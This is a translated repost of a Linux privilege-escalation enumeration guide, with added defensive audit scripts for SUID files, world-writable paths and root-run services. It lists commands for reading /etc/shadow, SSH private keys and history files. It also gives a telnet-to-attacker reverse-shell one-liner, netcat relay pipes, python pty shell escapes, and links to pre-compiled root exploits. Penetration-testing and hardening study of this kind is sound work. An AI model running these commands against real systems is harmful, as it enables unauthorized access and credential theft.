Linux Privilege Escalation: Approach


This article is a translation and repost of a foreign hacker's blog post. Original link: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Before you start, note that this is only a basic and brief introduction; not every command works on every flavour of Linux. In practice the most important thing is not to miss any detail.

The general approach to Linux privilege escalation:

  • Collect – the more information, the better
  • Process – sort the useful data out of the collected information, analyse it, and prioritise
  • Search – know what to search for and where to search
  • Adapt – modify and refine the exploit to fit the target environment
  • Try – be ready for unexpected errors and keep trying

I tested on Kali Linux (Debian) i386.

Operating System

Check the distribution and version

$ cat /etc/issue
Kali GNU/Linux Rolling \n \l
$ cat /etc/*-release
DISTRIB_ID=Kali
DISTRIB_RELEASE=kali-rolling
DISTRIB_CODENAME=kali-rolling
DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2016.2"
VERSION_ID="2016.2"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"

Check the kernel version

$ cat /proc/version
Linux version 4.8.0-kali2-686-pae (devel@kali.org) (gcc version 5.4.1 20161019 (Debian 5.4.1-3) ) #1 SMP Debian 4.8.11-1kali1 (2016-12-08)
$ uname -a
Linux kali2 4.8.0-kali2-686-pae #1 SMP Debian 4.8.11-1kali1 (2016-12-08) i686 GNU/Linux
$ uname -mrs
Linux 4.8.0-kali2-686-pae i686
$ rpm -q kernel
package kernel is not installed
$ dmesg | grep Linux
[    0.000000] Linux version 4.8.0-kali2-686-pae (devel@kali.org) (gcc version 5.4.1 20161019 (Debian 5.4.1-3) ) #1 SMP Debian 4.8.11-1kali1 (2016-12-08)
[    0.067253] ACPI: [Firmware Bug]: BIOS _OSI(Linux) query ignored
[    1.050165] Linux agpgart interface v0.103
[    1.226616] usb usb1: Manufacturer: Linux 4.8.0-kali2-686-pae uhci_hcd
[    1.241963] usb usb2: Manufacturer: Linux 4.8.0-kali2-686-pae ehci_hcd
[    5.315410] media: Linux media interface: v0.10
[    5.316518] Linux video capture interface: v2.00
$ ls /boot | grep vmlinuz-
vmlinuz-4.6.0-kali1-686-pae
vmlinuz-4.8.0-kali2-686-pae

Check the environment variables

$ cat /etc/profile
$ cat /etc/bashrc
$ cat ~/.bash_profile
$ cat ~/.bashrc
$ cat ~/.bash_logout
$ env
$ set

Is there a printer?

$ lpstat -a
bash: lpstat: command not found

Applications & Services

Which services are running? Which user privileges does each service have?

$ ps aux
$ ps -ef
$ top
$ cat /etc/services

Which services run as root? Of those, which are vulnerable?

$ ps aux | grep root
$ ps -ef | grep root

Which applications are installed, and which versions? Which of them are currently running?

$ ls -alh /usr/bin/
$ ls -alh /sbin/
$ dpkg -l
$ rpm -qa
$ ls -alh /var/cache/apt/archives
$ ls -alh /var/cache/yum/
ls: cannot access '/var/cache/yum/': No such file or directory

Is any service misconfigured, or has a vulnerable plugin been installed?

Check the configuration files of the various services.

$ cat /etc/syslog.conf
$ cat /etc/chttp.conf
$ cat /etc/lighttpd.conf            
$ cat /etc/cups/cupsd.conf
$ cat /etc/inetd.conf               #inetd
$ cat /etc/apache2/apache2.conf     #apache
$ cat /etc/my.cnf                   #mysql
$ cat /etc/httpd/conf/httpd.conf    #httpd
$ cat /opt/lampp/etc/httpd.conf
$ ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

Are there any scheduled tasks?

Check crontab.

$ crontab -l
$ ls -alh /var/spool/cron
$ ls -al /etc/ | grep cron
$ ls -al /etc/cron*
$ cat /etc/cron*
$ cat /etc/at.allow
$ cat /etc/at.deny
$ cat /etc/cron.allow
$ cat /etc/cron.deny
$ cat /etc/crontab
$ cat /etc/anacrontab
$ cat /var/spool/cron/crontabs/root

Are there any plaintext usernames or passwords?

$ grep -i user [filename]
$ grep -i pass [filename]
$ grep -C 5 "password" [filename]
$ find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   #Joomla

Networking

Which network interfaces (NICs) are there? Is the system connected to a network?

$ /sbin/ifconfig -a
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.158.171  netmask 255.255.255.0  broadcast 172.16.158.255
        inet6 fe80::20c:29ff:fe6b:6737  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:6b:67:37  txqueuelen 1000  (Ethernet)
        RX packets 267  bytes 27100 (26.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 196  bytes 18001 (17.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 19  base 0x2000  
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 160  bytes 12960 (12.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 160  bytes 12960 (12.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
$ cat /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
 
source /etc/network/interfaces.d/*
 
# The loopback network interface
auto lo
iface lo inet loopback
 
$ cat /etc/sysconfig/network
cat: /etc/sysconfig/network: No such file or directory

Check the network configuration. DHCP server? DNS server? Gateway?

$ cat /etc/resolv.conf
# Generated by NetworkManager
search localdomain
nameserver 172.16.158.2
 
$ cat /etc/sysconfig/network
cat: /etc/sysconfig/network: No such file or directory
 
$ cat /etc/networks
default     0.0.0.0
loopback    127.0.0.0
link-local  169.254.0.0
 
$ iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
 
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
 
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination 
 
$ hostname
kali2
 
$ dnsdomainname

Which other users or hosts communicate with this system?

$ lsof -i
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient 20840 root    6u  IPv4  39114      0t0  UDP *:bootpc 
 
$ lsof -i :80
 
$ grep 80 /etc/services     # services on port 80; note this also matches ports that merely contain "80", such as 1080
 
$ netstat -antup
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp        0      0 0.0.0.0:68              0.0.0.0:*                           20840/dhclient
 
$ netstat -antpx        # a lot of output, not shown here
 
$ netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp        0      0 0.0.0.0:68              0.0.0.0:*                           20840/dhclient
 
$ chkconfig --list
bash: chkconfig: command not found
 
$ chkconfig --list | grep 3:on
bash: chkconfig: command not found
 
$ last
root     tty7         :0               Mon Jan 30 19:57    gone - no logout
reboot   system boot  4.8.0-kali2-686- Mon Jan 30 19:57   still running
 
wtmp begins Sat Jan 21 09:51:09 2017
 
$ w
 10:31:50 up  3:30,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty7     :0               Mon19   14:34m 13.12s 13.12s /usr/lib/xorg/X

IP and MAC addresses?

$ arp -e
Address                  HWtype  HWaddress           Flags Mask            Iface
172.16.158.2             ether   00:50:56:f7:b9:3f   C                     eth0
172.16.158.254           ether   00:50:56:f2:64:81   C                     eth0
 
$ route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         172.16.158.2    0.0.0.0         UG    100    0        0 eth0
172.16.158.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
172.16.158.0    0.0.0.0         255.255.255.0   U     100    0        0 eth0
 
$ /sbin/route -nee
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface    MSS   Window irtt
0.0.0.0         172.16.158.2    0.0.0.0         UG    100    0        0 eth0     0     0      0
172.16.158.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0     0     0      0
172.16.158.0    0.0.0.0         255.255.255.0   U     100    0        0 eth0     0     0      0

Is it possible to sniff packets? What can be captured? Watch live traffic.

$ tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
bash: tcpdump: command not found        # tcpdump is not installed...

Note: tcpdump tcp dst [ip][port]and tcp dst [ip][port]

Have you got a shell? Can you interact with it?

$ nc -lvp 4444    # Attacker. Input (Commands)
$ nc -lvp 4445    # Attacker. Output (Results)
$ telnet [attacker's ip] 4444 | /bin/sh | telnet [attacker's ip] 4445    # On the target system. Use the attacker's IP!

Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

Is port forwarding possible? Redirect the traffic and analyse it from another angle.

Note: http://www.boutell.com/rinetd/

Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip

Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

$ FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

Note: ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

$ ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
$ ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

Note: mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] > backpipe

$ mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 > backpipe    # Port Relay
$ mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080), traffic logged to inflow/outflow
$ mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe &    # Proxy monitor (Port 80 to 8080), backgrounded so inflow/outflow can be watched

Can a tunnel be used?

$ ssh -D 127.0.0.1:9050 -N [username]@[ip]
$ proxychains ifconfig

Confidential Information & Users

Who are you? Which users are logged in? What privileges does each user have?

$ id
$ who
$ w
$ last
$ cat /etc/passwd | cut -d: -f1    # List of users
$ grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
$ awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
$ cat /etc/sudoers
$ sudo -l

Which sensitive files can be found?

$ cat /etc/passwd
$ cat /etc/group
$ cat /etc/shadow
$ ls -alh /var/mail/

If you can get into the home directories, is there anything of interest?

$ ls -ahlR /root/
$ ls -ahlR /home/

Are there passwords in scripts, databases, configuration files or log files? Check the default paths and locations.

$ cat /var/apache2/config.inc
$ cat /var/lib/mysql/mysql/user.MYD
$ cat /root/anaconda-ks.cfg

Check the various history files: what did the user you are logged in as do previously?

$ cat ~/.bash_history
$ cat ~/.nano_history
$ cat ~/.atftp_history
$ cat ~/.mysql_history
$ cat ~/.php_history

What user information can be found?

$ cat ~/.bashrc
$ cat ~/.profile
$ cat /var/mail/root
$ cat /var/spool/mail/root

Can private key information be found?

$ cat ~/.ssh/authorized_keys
$ cat ~/.ssh/identity.pub
$ cat ~/.ssh/identity
$ cat ~/.ssh/id_rsa.pub
$ cat ~/.ssh/id_rsa
$ cat ~/.ssh/id_dsa.pub
$ cat ~/.ssh/id_dsa
$ cat /etc/ssh/ssh_config
$ cat /etc/ssh/sshd_config
$ cat /etc/ssh/ssh_host_dsa_key.pub
$ cat /etc/ssh/ssh_host_dsa_key
$ cat /etc/ssh/ssh_host_rsa_key.pub
$ cat /etc/ssh/ssh_host_rsa_key
$ cat /etc/ssh/ssh_host_key.pub
$ cat /etc/ssh/ssh_host_key

File Systems

Which configuration files in /etc/ are writable? Can a service be reconfigured?

$ ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.*w.*/'     # Anyone
$ ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^..w/'       # Owner
$ ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.....w/'    # Group
$ ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /w.$/'        # Other
 
$ find /etc/ -readable -type f 2>/dev/null               # Anyone
$ find /etc/ -maxdepth 1 -readable -type f 2>/dev/null   # Anyone, top level only

What can be found under /var/?

$ ls -alh /var/log
$ ls -alh /var/mail
$ ls -alh /var/spool
$ ls -alh /var/spool/lpd
$ ls -alh /var/lib/pgsql
$ ls -alh /var/lib/mysql
$ cat /var/lib/dhcp3/dhclient.leases

Are there any (hidden) settings/files on the website? Are there configuration files containing database information?

$ ls -alhR /var/www/
$ ls -alhR /srv/www/htdocs/
$ ls -alhR /usr/local/www/apache22/data/
$ ls -alhR /opt/lampp/htdocs/
$ ls -alhR /var/www/html/

Is there any information in the log files?

$ cat /etc/httpd/logs/access_log
$ cat /etc/httpd/logs/access.log
$ cat /etc/httpd/logs/error_log
$ cat /etc/httpd/logs/error.log
$ cat /var/log/apache2/access_log
$ cat /var/log/apache2/access.log
$ cat /var/log/apache2/error_log
$ cat /var/log/apache2/error.log
$ cat /var/log/apache/access_log
$ cat /var/log/apache/access.log
$ cat /var/log/auth.log
$ cat /var/log/chttp.log
$ cat /var/log/cups/error_log
$ cat /var/log/dpkg.log
$ cat /var/log/faillog
$ cat /var/log/httpd/access_log
$ cat /var/log/httpd/access.log
$ cat /var/log/httpd/error_log
$ cat /var/log/httpd/error.log
$ cat /var/log/lastlog
$ cat /var/log/lighttpd/access.log
$ cat /var/log/lighttpd/error.log
$ cat /var/log/lighttpd/lighttpd.access.log
$ cat /var/log/lighttpd/lighttpd.error.log
$ cat /var/log/messages
$ cat /var/log/secure
$ cat /var/log/syslog
$ cat /var/log/wtmp
$ cat /var/log/xferlog
$ cat /var/log/yum.log
$ cat /var/run/utmp
$ cat /var/webmin/miniserv.log
$ cat /var/www/logs/access_log
$ cat /var/www/logs/access.log
$ ls -alh /var/lib/dhcp3/
$ ls -alh /var/log/postgresql/
$ ls -alh /var/log/proftpd/
$ ls -alh /var/log/samba/
 
#Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/

If the commands you can execute are restricted, can you break out of the restriction?

$ python -c 'import pty;pty.spawn("/bin/bash")'
$ python -c 'import os; os.system("/bin/bash")'
$ /bin/sh -i

How are the file systems mounted?

$ mount
$ df -h

Are there any unmounted file systems?

$ cat /etc/fstab

What “Advanced Linux File Permissions” are used? Sticky bits, SUID & SGID

$ find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
$ find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
$ find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
 
$ find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID (parentheses needed, otherwise -type f only applies to the SUID branch)
$ for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
 
# find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
$ find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
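The defender's side of the SUID/SGID check above is to compare what is on disk against what is expected. The following is an added example (not from the original post or from g0tmi1k's blog): it lists set-id regular files below a root directory, diffs them against an allowlist file, and, so that it can run anywhere, builds a small constructed directory tree with one unexpected SUID file instead of scanning a real system. The path names in the demo tree and the allowlist format (one absolute path per line) are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit SUID/SGID files against an allowlist of expected paths.
# Assumes POSIX sh plus find/grep/sed/sort/mktemp; not part of the original post.

# Print regular files with SUID or SGID set below $1, sorted.
# -type f excludes symlinks so a binary is not reported twice.
list_setid() {
    find "$1" \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null | sort
}

# Report set-id files under $1 that are not listed in allowlist $2.
# Returns 0 when the tree is clean, 1 when unexpected files were found.
audit_setid() {
    unexpected=$(list_setid "$1" | grep -vxF -f "$2")
    [ -z "$unexpected" ] && return 0
    printf '%s\n' "$unexpected" | sed 's/^/UNEXPECTED set-id file: /'
    return 1
}

# Demonstration on a constructed temporary tree (the file names are made up):
# two expected set-id binaries and one hidden SUID file dropped into tmp/.
demo_setid_audit() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/usr/bin" "$tmp/tmp"
    : > "$tmp/usr/bin/passwd"; chmod 4755 "$tmp/usr/bin/passwd"   # expected SUID
    : > "$tmp/usr/bin/wall";   chmod 2755 "$tmp/usr/bin/wall"     # expected SGID
    : > "$tmp/tmp/.helper";    chmod 4755 "$tmp/tmp/.helper"      # unexpected SUID
    printf '%s\n' "$tmp/usr/bin/passwd" "$tmp/usr/bin/wall" > "$tmp/allow.txt"
    audit_setid "$tmp" "$tmp/allow.txt"
    rc=$?
    rm -rf "$tmp"
    return $rc
}

# On a real host: generate the allowlist once from a freshly installed,
# patched system (list_setid / > setid.allow) and re-run audit_setid / setid.allow
# from cron; any new line is worth an incident ticket.
demo_setid_audit
```

Running the demo prints one UNEXPECTED line for the file under tmp/ and exits 1; the two allowlisted binaries are silent. The allowlist is compared with exact full-line matching (grep -x -F), so a set-id file with the same name in a different directory is still reported.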

Where can you write to and execute from? A few ‘common’ places: /tmp, /var/tmp, /dev/shm

$ find / -writable -type d 2>/dev/null      # folders writable by the current user
$ find / -perm -222 -type d 2>/dev/null     # folders writable by owner, group and others
$ find / -perm -o=w -type d 2>/dev/null     # world-writeable folders
 
$ find / -perm -o=x -type d 2>/dev/null     # world-executable folders
 
$ find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null   # world-writeable & executable folders

Any “problem” files? World-writeable files, “nobody” files

$ find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable directories without the sticky bit
$ find /dir -xdev \( -nouser -o -nogroup \) -print   # files with no owner or no group
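The two questions above (which files under /etc/ can anyone write to, and which writable directories lack the sticky bit) are the checks a hardening script should run on a schedule. This added example (not code from the original post) packages both as shell functions that take a root directory, and demonstrates them on a constructed tree so the result is reproducible offline; the directory and file names in the demo are invented for the example.

```shell
#!/bin/sh
# Added example: report world-writable regular files and world-writable
# directories without the sticky bit below a root directory.
# Assumes find with symbolic -perm modes (GNU or BSD); not from the original post.

# Regular files that any user may modify, e.g. a world-writable service config.
world_writable_files() {
    find "$1" -type f -perm -o=w 2>/dev/null | sort
}

# Directories any user can write to where the sticky bit is NOT set: in such a
# directory one user can delete or rename another user's files (/tmp is world
# writable too, but its sticky bit prevents exactly that).
unprotected_writable_dirs() {
    find "$1" -type d -perm -o=w ! -perm -1000 2>/dev/null | sort
}

# Demonstration on a constructed temporary tree with paths printed relative
# to it. Expected: etc/app/app.conf is flagged, srv/uploads is flagged,
# tmp (sticky) and ro.conf are not.
demo_writable_audit() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/etc/app" "$tmp/tmp" "$tmp/srv/uploads"
    chmod 755 "$tmp/etc" "$tmp/etc/app" "$tmp/srv"   # fixed explicitly so umask does not matter
    : > "$tmp/etc/app/app.conf"; chmod 666 "$tmp/etc/app/app.conf"   # world-writable config
    : > "$tmp/etc/app/ro.conf";  chmod 644 "$tmp/etc/app/ro.conf"    # normal config
    chmod 1777 "$tmp/tmp"          # world-writable with sticky bit: acceptable
    chmod 777  "$tmp/srv/uploads"  # world-writable without sticky bit: flagged
    echo "world-writable files:"
    world_writable_files "$tmp" | sed "s|^$tmp||"
    echo "world-writable dirs without sticky bit:"
    unprotected_writable_dirs "$tmp" | sed "s|^$tmp||"
    rm -rf "$tmp"
}

# On a live host run e.g.: world_writable_files /etc ; unprotected_writable_dirs /
demo_writable_audit
```

The demo prints /etc/app/app.conf under the first heading and /srv/uploads under the second. A world-writable file under /etc/ is the case the question above is about: whoever can edit a service's configuration can usually make that service do something it should not, so such a finding is a fix-now item, not a note.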

Writing Exploit Code

Check which development tools and supported languages are installed.

$ find / -name perl*
$ find / -name python*
$ find / -name gcc*
$ find / -name cc

Can files be uploaded?

$ find / -name wget
$ find / -name nc*
$ find / -name netcat*
$ find / -name tftp*
$ find / -name ftp

Finding exploit code

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

Finding more information regarding the exploit

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) “Common” exploits. Warning. Pre-compiled binaries files. Use at your own risk

http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Preventive Measures

Want your own server to get rooted? Orz

If not, go through the following checks:

Is everything kept up to date: kernel, OS, applications, plugins, web services?
Set up a cron job to check for updates regularly.

Does every service run with the least privileges it needs?
For example, never run MySQL as root!
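To turn the "least privilege" check into something a cron job can run, the following added example (not from the original post) filters ps output for well-known network services whose process runs as root. The list of service names and the input format (one "user command args" line per process, as produced by ps -eo user,args) are assumptions of this example; the sample process lines are constructed for the demonstration and are not output from any real host.

```shell
#!/bin/sh
# Added example: flag common network services that are running as root.
# Assumes POSIX sh, awk and procps-style ps; not part of the original post.

# Service binaries that should normally run as a dedicated unprivileged user.
# Extend this list for your own environment (assumption of this example).
SERVICE_PATTERN='mysqld|mariadbd|apache2|httpd|nginx|postgres|php-fpm|redis-server|mongod'

# Reads "user command [args]" lines on stdin and prints those where the user is
# root and the basename of the command matches SERVICE_PATTERN.
root_services() {
    awk -v pat="^(${SERVICE_PATTERN})\$" '
        $1 == "root" {
            n = split($2, parts, "/"); base = parts[n]
            if (base ~ pat) print $0
        }'
}

# Live check on the current host.
live_root_services() {
    ps -eo user,args --no-headers | root_services
}

# Constructed sample process table for the demonstration (not real output):
# the root mysqld and root apache2 lines should be reported, nothing else.
sample_ps() {
    printf '%s\n' \
        'root /usr/sbin/sshd -D' \
        'root /usr/sbin/mysqld --datadir=/var/lib/mysql' \
        'mysql /usr/sbin/mysqld --datadir=/var/lib/mysql' \
        'www-data /usr/sbin/apache2 -k start' \
        'root /usr/sbin/apache2 -k start' \
        'root [kworker/0:1]'
}

demo_root_services() {
    sample_ps | root_services
}

demo_root_services
```

The demo prints exactly the two root lines for mysqld and apache2. One caveat when reading the live output: a web server's master process often runs as root only to bind port 80 and then forks workers as www-data, so an apache2 or nginx hit means "confirm the workers drop privileges", whereas a root mysqld is the misconfiguration the text above warns about.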

Here are some automated checking scripts:

http://pentestmonkey.net/tools/unix-privesc-check/

http://labs.portcullis.co.uk/application/enum4linux/

http://bastille-linux.sourceforge.net

Other Guides & Links

Enumeration

http://www.0daysecurity.com/penetration-testing/enumeration.html

http://www.microloft.co.uk/hacking/hacking3.htm

Misc

http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf

http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html
